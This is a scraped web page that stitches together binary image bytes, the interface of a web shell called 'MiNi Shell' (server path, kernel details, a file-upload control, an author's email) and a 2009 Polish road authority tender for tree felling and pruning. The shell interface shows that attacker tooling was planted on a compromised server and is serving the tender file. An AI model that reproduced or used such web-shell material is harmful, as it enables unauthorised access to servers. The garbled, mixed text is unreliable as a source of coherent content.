JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/167692-N-2009.html

<p class="kh_header"><b>Nowa Sól: Wycinka, podkrzesania, cięcie pielęgnacyjne, zdjęcia korony drzew 
w ciągach dróg powiatowych</b><br>
<b>Numer ogłoszenia: 167692 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Nowej Soli , ul. Wojska Polskiego 100b, 67-100 Nowa Sól, woj. lubuskie, tel. 068 4585330, faks 068 4585330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pzd-nowasol.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka, podkrzesania, cięcie pielęgnacyjne, zdjęcia korony drzew 
w ciągach dróg powiatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  wycinka, podkrzesanie, cięcie pielęgnacyjne, zdjęcie korony drzew w ciągach dróg powiatowych na terenie Powiatu Nowosolskiego.


2.	Przedmiot zamówienia należy wykonać w oparciu o niniejszy opis.


3.	Wycinka drzew:
3.1.	Wycięcie drzew za pomocą pił mechanicznych na głębokości 10 cm poniżej poziomu gruntu,
3.2.	Pocięcie dłużyc i konarów na klocki umożliwiające ręczny załadunek na środki transportowe,
3.3.	Uporządkowanie pasa drogowego oraz zasypanie miejsc po wycince materiałem stosowanym w poboczu w miejscu wycinki do poziomu istniejącego pobocza a poza poboczem do poziomu gruntu w otoczeniu prowadzonych robót oraz zagęszczenie mechaniczne,
3.4.	Usunięcie i likwidacja drobnych gałęzi po wycince należy do obowiązków Wykonawcy, należy je przeprowadzić w sposób nie zagrażający bezpieczeństwu ruchu drogowego oraz środowisku naturalnemu,
3.5.	Drewno pozyskane w wyniku wycinki podkrzesania, cięcia pielęgnacyjnego, zdjęcia korony zamawiający przekazuje Wykonawcy. Wykonawca zagospodaruje pozyskane drewno we własnym zakresie i na własny koszt uwzględniając ten fakt w upuście zaoferowanym zamawiającemu, który zawarty będzie w wartości ceny jednostkowej.


4.	Podkrzesanie i cięcie pielęgnacyjne drzew obejmuje:
4.1.	Podcięcie koron drzew od dołu (tzw. podkrzesanie) w ciągach ulicznych i pieszych w celu poprawienia widoczności i umożliwienia swobodnego poruszania się  pojazdów - w przypadku ruchu ulicznego wyznaczenie tzw. skrajni drogowej (Rozporządzenie Rady Ministrów z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie) oraz niedopuszczenie do urazów twarzy u pieszych przez gałęzie drzew nad przejściami,
4.2.	Usunięcie z korony drzewa gałęzi suchych, chorych, nadłamanych i ocierających się między sobą (tzw. cięcia pielęgnacyjne),
4.3.	Usuniecie gałęzi w ilości ograniczonej do niezbędnego minimum; w przypadku konieczności silniejszego podcięcia gałęzi od strony jezdni (ponad 20 %) należy zrównoważyć masę od strony przeciwnej przez przeprowadzenie częściowego rozluźnienia pozostałej części korony.
4.4.	Podstawowe zasady jakimi należy kierować się przy cięciu drzew:
4.4.1.	usuwanie i skracanie żywych gałęzi należy ograniczyć tylko do niezbędnego minimum,
4.4.2.	w trakcie jednorazowego zabiegu należy unikać usuwania więcej niż 15 % całej żywej masy gałęzi, a w przypadkach uzasadnionych innymi względami nie więcej jednak niż do 50% - dotyczy to tylko drzew dobrze znoszących cięcia,
4.4.3.	jeżeli sytuacja wymaga wykonania bardziej radykalnych cięć (ponad 50 %) zabieg należy rozłożyć na dwa lub nawet trzy etapy (okresy wegetacji),
4.4.4.	należy unikać usuwania żywych gałęzi o dużych średnicach, czyli przekraczających 10 cm,
4.4.5.	usuwając żywe gałęzie należy wykonać to w taki sposób, aby nie uszkodzić ich nasad. Nie wolno wykonywać cięć zbyt płaskich ale również nie należy pozostawiać kikutów,
4.4.6.	należy pamiętać, aby natychmiast po usunięciu żywej gałęzi powstałą ranę właściwie zabezpieczyć przed infekcją, przy czym trzeba się kierować następującymi zasadami:
4.4.6.1.	rany o średnicy do 10 cm zasmarowuje się w całości jednym z 
dostępnych na rynku preparatów takich jak Funaben 3 lub Santar,
4.4.6.2.	rany o średnicy ponad 10 cm zabezpiecza się bezwzględnie dwuskładnikowo tzn. krawędzie czyli miejsca z których będzie wyrastała tkanka żywa i drewno czynne środkiem o działaniu powierzchniowym typu Santar lub Funaben (pierścień o grubości 1,5 - 2 cm); pozostałą cześć rany wewnątrz pierścienia środkiem impregnującym (np. Imprex W),
4.4.6.3.	wszystkie stosowane środki impregnacyjne są toksyczne nie tylko dla patogenów chorób ale również dla tkanki żywej drzew; przed ich zastosowaniem na powierzchnię ran należy uprzednio zabezpieczyć części żywe (krawędzie) preparatem  powierzchniowym typu Santar lub Funaben,
4.4.6.4.	nie powinno się stosować do malowania ran wersji białej Funabenu ponieważ jest to barwa nieodpowiednia ze względów estetycznych dla drzew ozdobnych. Przed zastosowaniem wersji białej trzeba ją zabarwić na kolor zbliżony do korowiny (szary lub ciemnozielony),
4.4.7.	przy wykonywaniu cięć koron należy pamiętać, aby uzyskana forma nie odbiegała od pokroju jakie drzewo miało przed zabiegiem,
4.4.8.	usuwając większe gałęzie należy wykonać to w taki sposób, aby nie dopuścić do dodatkowych skaleczeń drzewa. W tym celu wskazane jest, aby większe konary i gałęzie usuwać odcinkami od wierzchołka i opuszczać je na ziemię za pomocą lin, a także zwrócić szczególną uwagę przy manewrowaniu w koronie koszem podnośnika,
4.4.9.	przy usuwaniu starego suszu (gałęzie i ich szczątki) należy wykonać to w taki sposób, aby nie dopuścić do skaleczenia żywej tkanki wytworzonej zazwyczaj w formie obrączki u nasady,
4.4.10.	przycięcie gałęzi należy wykonać z wysięgnika,
4.4.11.	po zakończeniu prac należy uporządkować pas drogowy z gałęzi poprzez ich usunięcie i likwidację w sposób nie zagrażający środowisku naturalnemu i bezpieczeństwu na koszt Wykonawcy.

5.	Zdjęcie korony drzewa, tzw. ogłowienie.
5.1.	Zdjęcie korony drzewa należy każdorazowo indywidualnie ustalić z zamawiającym ustalając sposób ogłowienia z uwzględnieniem warunków bezpieczeństwa oraz walorów estetycznych,
5.2.	Przy zdjęciu korony drzewa należy uwzględnić punkty: 4.4.6; 4.4.6.2;  4.4.6.3; 4.4.6.4;  4.4.8; 4.4.10, 
5.3.	Do wycinki drzew, podkrzesania i ogłowienia wprowadzono pojęcie warunki utrudnione - są to warunki:
a)	kolizja bezpośrednia z napowietrznymi liniami energetycznymi i telekomunikacyjnymi,
b)	konieczność wykonania zabiegów pielęgnacyjnych w bezpośrednim sąsiedztwie zabudowań i nad zabudowaniami dachowymi,
6. 	W przypadku kolizji z napowietrznymi liniami energetycznymi i telekomunikacyjnymi Wykonawca uzgodni sposób prowadzenia prac w obrębie tych linii z ich właścicielami.

7.	Przed przystąpieniem do wykonania przedmiotu zamówienia Wykonawca ustali z Zamawiającym kolejność oraz zakres rzeczowy robót na wyznaczonej drodze.

8.	Przed przystąpieniem do wykonywania robót Wykonawca zobowiązany jest do wykonania we własnym zakresie i na własny koszt projektu oznakowania prowadzonych robót, uzgodnionego z zarządcą drogi i właściwym komendantem Policji oraz zatwierdzonego w organie zarządzającym ruchem (dla dróg powiatowych jest nim Starosta Powiatu).

9.	Wykonawca ponosi pełną odpowiedzialność za prowadzenie, organizowanie i oznakowanie robót oraz za bezpieczeństwo i higienę pracy na terenie wykonywanych robót.

10.	Wykonawca będzie prowadził roboty z zachowaniem przepisów i zasad BHP oraz w sposób nie stwarzający zagrożenia dla ruchu drogowego.

11.	Wykonawca ma obowiązek znać i stosować w czasie prowadzenia robót wszelkie przepisy dotyczące ochrony środowiska, p.poż, ruchu drogowego, bezpieczeństwa i higieny pracy.

12.	Sprzęt z obsługą i materiałami eksploatacyjnymi niezbędnymi do wykonania przedmiotu zamówienia zapewnia własnym staraniem i na własny koszt Wykonawca. Minimalne wymagania sprzętowe dotyczące posiadania sprzętu specjalistycznego, które musi spełnić wykonawca w trakcie wykonywania przedmiotu zamówienia to posiadanie:
a)	pił spalinowych - szt. 2
b)	samochodu ciężarowego o ładowności min 5 ton - szt. 1
c)	wysięgnika z koszem na samochodzie ciężarowym - szt. 1
d)	zagęszczarki mechanicznej - szt. 1
e)	dźwigu samojezdnego o udźwigu min. 10  ton - szt. 1,

13.	Cena jednostkowa podana przez Wykonawcę w Formularzu cenowym stanowiącym Rozdział V Specyfikacji Istotnych Warunków Zamówienia jest ostateczna i musi zawierać wszystkie koszty ponoszone przez Wykonawcę w celu wykonania przedmiot zamówienia np.:
-	koszty: robocizny, sprzętu, materiałów, paliwa, 
-	koszty: ogólne, ubezpieczeń, podatków,
-	koszty uzyskania wymaganych zezwoleń i uzgodnień,
-	zysk Wykonawcy,
-	koszty transportu i składowania drewna,
-	koszty usunięcia i likwidacji drewna, gałęzi, konarów,
-	koszty sprowadzenie sprzętu,
-	zaoferowany upust za pozyskane w wyniku wycinki, podkrzesania, cięcia pielęgnacyjnego, zdjęcia korony drzew drewno.

14.	Wykonane roboty przy wycince, podkrzesaniu drzew oraz zdejmowaniu korony drzew podlegają odbiorowi technicznemu.

15.	Interwencyjne wycięcie, podkrzesanie, cięcie pielęgnacyjne, zdjęcie korony drzew Wykonawca zobowiązany jest wykonać w terminie 12 godzin od otrzymania zlecenia (telefonicznego lub pisemnego) od zamawiającego, natomiast planowane zobowiązany jest rozpocząć w terminie 3 dni od otrzymania zlecenia (telefonicznego lub pisemnego) od Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Kwotę wadium ustala się w wysokości  900,00 PLN (słownie: dziewięćset złotych 00/100).
2.	Wadium należy wpłacić przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
§	pieniądzu,
§	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
§	gwarancjach bankowych;
§	gwarancjach ubezpieczeniowych,
§	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b, ust. 5, pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm),
4.Dowód wniesienia wadium  - należy załączyć do oferty w formie oryginału.
5.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr: 89 203000451110000000284750 - Starostwo 
       Powiatowe w Nowej Soli, ul. Moniuszki 3 b, 67-100 Nowa Sól.
uwaga: w tytule przelewu proszę wpisać, czego dotyczy wadium (przetarg PN 16/2009/PZD)
6.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
7.W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich może  
       złożyć wadium o takiej wartości by ich suma wynosiła 900,00 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	W  przetargu  mogą  wziąć  udział  Wykonawcy,  którzy: 
a)	nie  podlegają  wykluczeniu  z   postępowania  na  podstawie  art. 24, ust. 1 i 2 Prawo zamówień publicznych (tekst jednolity Dz. U. Nr 223, poz. 1655 z 2007r.)
b)	spełniają  warunki  określone  w  art. 22 ust. 1 Prawo zamówień publicznych (tekst jednolity Dz. U. Nr 223, poz. 1655 z 2007r.)
c)	spełniają dodatkowe warunki szczególne określone w punkcie 8.5. niniejszej instrukcji,
2	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.


3	Z postępowania o udzielenie zamówienia wyklucza się:
a.	wykonawców, którzy w ciągu ostatnich 3 lat przed wszczęciem postępowania wyrządzili szkodę nie wykonując  zamówienia lub wykonując je nienależycie, a szkoda ta nie została dobrowolnie naprawiona do dnia wszczęcia postępowania, chyba że niewykonanie lub nienależyte wykonanie jest następstwem okoliczności, za które wykonawca nie ponosi odpowiedzialności;
b.	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; 
c.	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
d.	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
e.	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
f.	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
g.	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
h.	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
i.	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
j.	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 Prawa zamówień publicznych.


4	Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
a.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2;
b.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
c.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3; 
d.	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
 

5	Dodatkowe warunki szczególne udziału wykonawców w postępowaniu: nie dotyczy

6	Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
Ocena zostanie dokonana w oparciu o przedstawiony przez Wykonawcę Formularz oferty oraz załączniki stanowiące jego integralną część a w szczególności:
a)	oświadczenia, o których mowa w punkcie 9.1 niniejszej instrukcji,
b)	dokumenty, o których mowa w punkcie 9.2 niniejszej instrukcji,
c)	zaakceptowaną umowę,
d)	wypełniony Formularz kosztorysu ofertowego,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1	Wymagane Oświadczenia:
a)	oświadczenie o spełnieniu warunków udziału w postępowaniu wzór formularza oświadczenia zamieszczony jest w Rozdziale III, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć oświadczenie);
b)	oświadczenie wskazujące części zamówienia, które wykonawca powierzy podwykonawcom;

9.2	Wymagane dokumenty:
2.1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych z dnia 29 stycznia 2004r. zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć n/w dokumenty):
a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,

2.2	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów: nie dotyczy

2.3	Inne wymagane dokumenty:	
a)	Dowód wniesienia wadium (w formie oryginału) - wnosi się przed upływem terminu składania ofert,
b)	Pełnomocnictwo - jeśli dotyczy (należy załączyć w formie oryginału lub kopii poświadczonej przez notariusza) - Ustanowienie pełnomocnika do reprezentowania wykonawców (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców) w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego, które w szczególności powinno:
.	jednoznacznie określać postępowanie do którego się odnosi,
.	precyzować zakres umocowania,
.	wskazywać pełnomocnika,
.	wyliczać wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia,
.	być podpisane przez każdego wykonawcę,
c)	Stosowne pełnomocnictwo (należy załączyć w formie oryginału lub kopii poświadczonej przez notariusza) do podpisania oferty w sytuacji, w której uprawnienie do podpisania oferty nie wynika z zapisu w rejestrze lub ewidencji.

2.4	Dokumenty zamienne wymagane od Wykonawców zagranicznych:
1.	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów wymienionych w punkcie 9.2.1. a, składa dokument lub dokumenty wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b)	nie ogłoszono wobec niego zakazu ubiegania się o zamówienie,
2.	dokumenty o których mowa w ust. 1 pkt 1 lit a i b powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składnia ofert.
3.	jeżeli w kraju pochodnia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów o których mowa w ust. 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,
	przepis ust. 2 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pzd-nowasol.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Nowej Soli
ul. Wojska Polskiego 100 b
67-100 Nowa Sól
pok. nr 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Nowej Soli
ul. Wojska Polskiego 100 b
67-100 Nowa Sól
pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com